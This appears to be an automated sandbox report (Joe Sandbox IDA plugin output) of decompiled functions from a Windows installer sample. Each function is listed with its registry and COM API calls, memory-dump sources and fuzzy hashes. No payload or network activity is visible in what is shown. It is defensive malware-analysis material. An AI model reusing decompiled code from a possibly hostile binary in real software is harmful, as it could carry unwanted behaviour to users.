                                                                                                                                                              				char _v52;
                                                                                                                                                              				char _v53;
                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                              				signed int _t19;
                                                                                                                                                              				signed int _t20;
                                                                                                                                                              				void* _t27;
                                                                                                                                                              				signed int _t45;
                                                                                                                                                              
                                                                                                                                                              				_t44 = __esi;
                                                                                                                                                              				_t43 = __edi;
                                                                                                                                                              				_t31 = __ebx;
                                                                                                                                                              				_push(0xffffffff);
                                                                                                                                                              				_push(0x50ddb4);
                                                                                                                                                              				_push( *[fs:0x0]);
                                                                                                                                                              				_t19 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_t20 = _t19 ^ _t45;
                                                                                                                                                              				_v20 = _t20;
                                                                                                                                                              				_push(_t20);
                                                                                                                                                              				 *[fs:0x0] =  &_v16;
                                                                                                                                                              				_v60 = __ecx;
                                                                                                                                                              				_t49 = _a4;
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					E004175C0(E00434050( &_v53));
                                                                                                                                                              					_v8 = 0;
                                                                                                                                                              					_t42 =  &_v52;
                                                                                                                                                              					_t27 = E004F80E0(__ebx, _v60, __edi, __esi, _t49,  &_v52, _a8, _a12); // executed
                                                                                                                                                              					E0045184A(_a4, _t27);
                                                                                                                                                              					_v8 = 0xffffffff;
                                                                                                                                                              					E004176E0();
                                                                                                                                                              				}
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8(_a4, _t31, _v20 ^ _t45, _t42, _t43, _t44);
                                                                                                                                                              			}














                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcscpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3048848545-0
                                                                                                                                                              • Opcode ID: 71ae127853fe379245b6bcb1b928257f265475b7083d30dc35f65075c8cfd88c
                                                                                                                                                              • Instruction ID: 9f85bb52fc9fbc8ed2681f036a1197e0334804cff0233300be372910fdc1c147
                                                                                                                                                              • Opcode Fuzzy Hash: 71ae127853fe379245b6bcb1b928257f265475b7083d30dc35f65075c8cfd88c
                                                                                                                                                              • Instruction Fuzzy Hash: B3112E71904108AFCB04DF95D841FEEB7B8FF08714F00462EF81597291EB346944CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00422580(intOrPtr* __ecx, void* _a4, short* _a8, short* _a12, int _a16, int _a20, struct _SECURITY_ATTRIBUTES* _a24, intOrPtr* _a28) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				intOrPtr* _v20;
                                                                                                                                                              				long _t27;
                                                                                                                                                              
                                                                                                                                                              				_v20 = __ecx;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t27 = RegCreateKeyExW(_a4, _a8, 0, _a12, _a16, _a20, _a24,  &_v8,  &_v16); // executed
                                                                                                                                                              				_v12 = _t27;
                                                                                                                                                              				if(_a28 != 0) {
                                                                                                                                                              					 *_a28 = _v16;
                                                                                                                                                              				}
                                                                                                                                                              				if(_v12 == 0) {
                                                                                                                                                              					_v12 = E0041EF10(_v20);
                                                                                                                                                              					 *_v20 = _v8;
                                                                                                                                                              					 *(_v20 + 4) = _a20 & 0x00000300;
                                                                                                                                                              				}
                                                                                                                                                              				return _v12;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,?), ref: 004225B2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: da7658d9d66157049bda50bbad2381ad61c0328b49598051536313ee3ed6bc67
                                                                                                                                                              • Instruction ID: f1e750a2e26c41efd03ff71885b0f68c48a1e76b5339024fafdb6696c1735a02
                                                                                                                                                              • Opcode Fuzzy Hash: da7658d9d66157049bda50bbad2381ad61c0328b49598051536313ee3ed6bc67
                                                                                                                                                              • Instruction Fuzzy Hash: 1B11D0B5A00209EFCB04CF98D994AEFBBB8FB48300F108559E915A7340D734AA51CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00424630(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				int _t10;
                                                                                                                                                              
                                                                                                                                                              				_push(__ecx);
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				if((E00404630(__ecx, _a4) & 0x000000ff) != 0) {
                                                                                                                                                              					_t10 = IsValidCodePage(E00423990(_v8, _a4)); // executed
                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                              						if(E004244C0(E00423900(_v8, _a4) & 0x000000ff) != 0) {
                                                                                                                                                              							return 1;
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				return 0;
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?), ref: 0042465B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CodePageValid
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1911128615-0
                                                                                                                                                              • Opcode ID: c9f08de8c4f879767d6e2a12e85733756157903cfeeece9dab4b5c17de24084a
                                                                                                                                                              • Instruction ID: acd3b80e2f9a2ac0ace554b376bf7bf21ec0217d72e302f345e402b3ba2f3122
                                                                                                                                                              • Opcode Fuzzy Hash: c9f08de8c4f879767d6e2a12e85733756157903cfeeece9dab4b5c17de24084a
                                                                                                                                                              • Instruction Fuzzy Hash: 0EF09CF4700124778E04DF51F8459BB339C9E92309750415AF80687201D53DDA1966A9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E0041EEA0(intOrPtr* __ecx, void* _a4, short* _a8, int _a12) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				long _v12;
                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                              				long _t19;
                                                                                                                                                              
                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t19 = RegOpenKeyExW(_a4, _a8, 0, _a12,  &_v8); // executed
                                                                                                                                                              				_v12 = _t19;
                                                                                                                                                              				if(_v12 == 0) {
                                                                                                                                                              					_v12 = E0041EF10(_v16);
                                                                                                                                                              					 *_v16 = _v8;
                                                                                                                                                              					 *(_v16 + 4) = _a12 & 0x00000300;
                                                                                                                                                              				}
                                                                                                                                                              				return _v12;
                                                                                                                                                              			}








                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExW.KERNEL32(00000001,?,00000000,00000000,00000000,Software\Microsoft\Internet Explorer\,00000001), ref: 0041EECA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Open
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                              • Opcode ID: 7933fb232ceb25f8994056af9fbb8c987e53069f7ad553ecf10823e6c5af83cf
                                                                                                                                                              • Instruction ID: e72a7226712429adf47ea8eac5b50b7f1d65c1406d4f5b2af12a8abfb9092063
                                                                                                                                                              • Opcode Fuzzy Hash: 7933fb232ceb25f8994056af9fbb8c987e53069f7ad553ecf10823e6c5af83cf
                                                                                                                                                              • Instruction Fuzzy Hash: EC01B679A00208EFCB04DF95D885AEEBBB5EB88300F10C5AAE8159B340D7349A50DB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00429BB0(void** __ecx, short* _a4, char* _a8) {
                                                                                                                                                              				int _v8;
                                                                                                                                                              				int _v12;
                                                                                                                                                              				long _v16;
                                                                                                                                                              				void** _v20;
                                                                                                                                                              				long _t15;
                                                                                                                                                              
                                                                                                                                                              				_v20 = __ecx;
                                                                                                                                                              				do {
                                                                                                                                                              				} while (0 != 0 || 0 != 0);
                                                                                                                                                              				_v12 = 4;
                                                                                                                                                              				_t15 = RegQueryValueExW( *_v20, _a4, 0,  &_v8, _a8,  &_v12); // executed
                                                                                                                                                              				_v16 = _t15;
                                                                                                                                                              				if(_v16 == 0) {
                                                                                                                                                              					if(_v8 == 4) {
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              					return 0xd;
                                                                                                                                                              				}
                                                                                                                                                              				return _v16;
                                                                                                                                                              			}









                                                                                                                                                              APIs
                                                                                                                                                              • RegQueryValueExW.KERNEL32(DDD124F9,00000004,00000000,DDD124F9,?,00000004,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System), ref: 00429BE0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                              • Opcode ID: 1a4580bf5f4484c55dbb0b26d34549cd485e0b3af099ee7def2407f50086bd3c
                                                                                                                                                              • Instruction ID: f7dae3d87c89e33c9cd46dbbadd7aec66fcca4881972f95749d9c857ab391f74
                                                                                                                                                              • Opcode Fuzzy Hash: 1a4580bf5f4484c55dbb0b26d34549cd485e0b3af099ee7def2407f50086bd3c
                                                                                                                                                              • Instruction Fuzzy Hash: 35F04971A00218EBDB04DF99E848BAFB7B4BB48304F40859AE91197390E378AE04CB95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00433D20(signed int _a4) {
                                                                                                                                                              				char _v16;
                                                                                                                                                              				void* __ebp;
                                                                                                                                                              				signed int _t12;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				void* _t25;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 > 0) {
                                                                                                                                                              					__eflags = (_t12 | 0xffffffff) / _a4 - 0x34;
                                                                                                                                                              					if(__eflags < 0) {
                                                                                                                                                              						E00417B30(0);
                                                                                                                                                              						E00456A4C( &_v16, 0x544b88);
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_a4 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t15 = E0044F76F(_t19, _t25, _a4 * 0x34, _a4 * 0x34); // executed
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}










                                                                                                                                                              APIs
                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00433D55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                              • Opcode ID: e2dc7320d69519031074de49e6258e1b0fa84e3aa3c6c9dc91975f3d0eb220b7
                                                                                                                                                              • Instruction ID: e43e9bdc0413b454325974aea46165c8a24d2e5647b2e6daf7de51821789c90a
                                                                                                                                                              • Opcode Fuzzy Hash: e2dc7320d69519031074de49e6258e1b0fa84e3aa3c6c9dc91975f3d0eb220b7
                                                                                                                                                              • Instruction Fuzzy Hash: 2FE02B7090010866EF04EF60C84279D3B29AB10369F00863BFC0B5A0C1DB38EB8986CD
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0041EF10(void** __ecx) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void** _v12;
                                                                                                                                                              				long _t12;
                                                                                                                                                              
                                                                                                                                                              				_v12 = __ecx;
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				if( *_v12 != 0) {
                                                                                                                                                              					_t12 = RegCloseKey( *_v12); // executed
                                                                                                                                                              					_v8 = _t12;
                                                                                                                                                              					 *_v12 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				_v12[1] = 0;
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}







                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: 91ea06a02c1e2abaa4150cc088f806866b2a54e11f8803adc4cfb31c19173421
                                                                                                                                                              • Instruction ID: 820672166823583b4fef396b48c4dbdbd765742b514186620d846768b76c89e1
                                                                                                                                                              • Opcode Fuzzy Hash: 91ea06a02c1e2abaa4150cc088f806866b2a54e11f8803adc4cfb31c19173421
                                                                                                                                                              • Instruction Fuzzy Hash: ADF0E578900308EFDB00CF98D594B9EBFB4EB49304F1080D9E804AB390C776AE85DB90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(000000FF,00000000,000000FF,0053D3B4,DDD124F9,?,?,00490443,0051BAFC,00000000,00000017,00000000,00000000,000000FF,00000000,000000FF), ref: 0044306C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                              • Opcode ID: e2591718d38672465c40d119d12b6cfdae1246e638e281d2108abddb0f8c5d8b
                                                                                                                                                              • Instruction ID: d7e829fc0369689cf003dd1b57fd33423f6668e70923e4d6f68ba6fba734b568
                                                                                                                                                              • Opcode Fuzzy Hash: e2591718d38672465c40d119d12b6cfdae1246e638e281d2108abddb0f8c5d8b
                                                                                                                                                              • Instruction Fuzzy Hash: 2AD067B660420CBB8B04CFD9EC45CAEB7BCEB5C750B108549B90887300D631AE109BA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • RegDeleteValueW.KERNEL32(00000000,?), ref: 00422F69
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1108222502-0
                                                                                                                                                              • Opcode ID: 623dbd52a23a3001517e907731fa794683d2616bae9e7e4ea07a56ac7a586e52
                                                                                                                                                              • Instruction ID: 466e9685c4020b865daf75248f732fbf60c7d645a2e0b63f6194d1e79d89bd0b
                                                                                                                                                              • Opcode Fuzzy Hash: 623dbd52a23a3001517e907731fa794683d2616bae9e7e4ea07a56ac7a586e52
                                                                                                                                                              • Instruction Fuzzy Hash: E7D0A77170420DBB8B28CF95EA44CABB7B8EB5D340740816EF80DC7310E631AD20E69C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                              			E0044FAA9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                              				intOrPtr _t9;
                                                                                                                                                              				void* _t18;
                                                                                                                                                              
                                                                                                                                                              				_push(0xc);
                                                                                                                                                              				_push(0x544118);
                                                                                                                                                              				E00456860(__ebx, __edi, __esi);
                                                                                                                                                              				E004579B4();
                                                                                                                                                              				 *(_t18 - 4) =  *(_t18 - 4) & 0x00000000;
                                                                                                                                                              				_t9 = E0044F9BE(__edx,  *((intOrPtr*)(_t18 + 8))); // executed
                                                                                                                                                              				 *((intOrPtr*)(_t18 - 0x1c)) = _t9;
                                                                                                                                                              				 *(_t18 - 4) = 0xfffffffe;
                                                                                                                                                              				E0044FADF();
                                                                                                                                                              				return E004568A5( *((intOrPtr*)(_t18 - 0x1c)));
                                                                                                                                                              			}






                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004579B4: __lock.LIBCMT ref: 004579B6
                                                                                                                                                              • __onexit_nolock.LIBCMT ref: 0044FAC1
                                                                                                                                                                • Part of subcall function 0044F9BE: __decode_pointer.LIBCMT ref: 0044F9CD
                                                                                                                                                                • Part of subcall function 0044F9BE: __decode_pointer.LIBCMT ref: 0044F9DD
                                                                                                                                                                • Part of subcall function 0044F9BE: __msize.LIBCMT ref: 0044F9FB
                                                                                                                                                                • Part of subcall function 0044F9BE: __realloc_crt.LIBCMT ref: 0044FA1F
                                                                                                                                                                • Part of subcall function 0044F9BE: __realloc_crt.LIBCMT ref: 0044FA35
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA47
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA55
                                                                                                                                                                • Part of subcall function 0044F9BE: __encode_pointer.LIBCMT ref: 0044FA60
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __encode_pointer$__decode_pointer__realloc_crt$__lock__msize__onexit_nolock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1316407801-0
                                                                                                                                                              • Opcode ID: 03bfc8f837780bf28ef7ca825567f3edbeaad42c8c69f643a1cb87bab58b4b47
                                                                                                                                                              • Instruction ID: 0060cbbf07bae28ecfac1589c5c3401a5b99e779319e2f9ba1ee8d50a06e8e19
                                                                                                                                                              • Opcode Fuzzy Hash: 03bfc8f837780bf28ef7ca825567f3edbeaad42c8c69f643a1cb87bab58b4b47
                                                                                                                                                              • Instruction Fuzzy Hash: D3D05B71C41209E6EF00BBA6D90275D76717F00319F50416EB414671D3C77C09499A59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E00454D7B(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                              				signed int _t3;
                                                                                                                                                              				void* _t7;
                                                                                                                                                              				void* _t8;
                                                                                                                                                              
                                                                                                                                                              				_t3 = E00454CF2(_t7, _t8, _a4, _a8); // executed
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				return  ~_t3;
                                                                                                                                                              			}






                                                                                                                                                              0x00454d86
                                                                                                                                                              0x00454d8f
                                                                                                                                                              0x00454d92

                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: __waccess_s
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4272103461-0
                                                                                                                                                              • Opcode ID: 121c4f77d4c72d3789264fc0d0d617dc9724d87233f222cead199be475d85574
                                                                                                                                                              • Instruction ID: c01e5d1af73e778fe685e865bf1456fca0106d4cf4c4f886beebd409df1a495b
                                                                                                                                                              • Opcode Fuzzy Hash: 121c4f77d4c72d3789264fc0d0d617dc9724d87233f222cead199be475d85574
                                                                                                                                                              • Instruction Fuzzy Hash: BBC02B3300400C3F4F091DEAEC00C043F09C6C0334710C116FD0D8C091CD33D4508140
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004BF540() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				_t1 = E004AD770(); // executed
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x004bf543
                                                                                                                                                              0x004bf549

                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 5dbd62528cc33c2737e932bb5ae544e02b3404c8f173e11231d85b841e937ac0
                                                                                                                                                              • Instruction ID: bec5800c557f340bf7698a95b029d2fbb24a3ee7f25a093016f180e1ef5b7da0
                                                                                                                                                              • Opcode Fuzzy Hash: 5dbd62528cc33c2737e932bb5ae544e02b3404c8f173e11231d85b841e937ac0
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004BF560() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              				void* _t2;
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t4;
                                                                                                                                                              
                                                                                                                                                              				_t1 = E004C0DC0(_t2, _t3, _t4); // executed
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}







                                                                                                                                                              0x004bf563
                                                                                                                                                              0x004bf569

                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 36217ca55ba7067f56672730f101b919342073117d73d6d31b8693e56017cb5f
                                                                                                                                                              • Instruction ID: cf1a588253af38d5c78ed486e3d1a561b58262cfe137cd86dc82a65ec62bf7f7
                                                                                                                                                              • Opcode Fuzzy Hash: 36217ca55ba7067f56672730f101b919342073117d73d6d31b8693e56017cb5f
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00501CE0() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				_t1 = E0041C3A0(); // executed
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x00501ce3
                                                                                                                                                              0x00501ce9

                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3616842037-0
                                                                                                                                                              • Opcode ID: 9c390c8b228b117941798a9353a1551da3fb7115f03c5a0abe938777e2469494
                                                                                                                                                              • Instruction ID: 6dac575237f18692247e38d0b2baf8532e2833ff646b7f3847b638fe8afd50dd
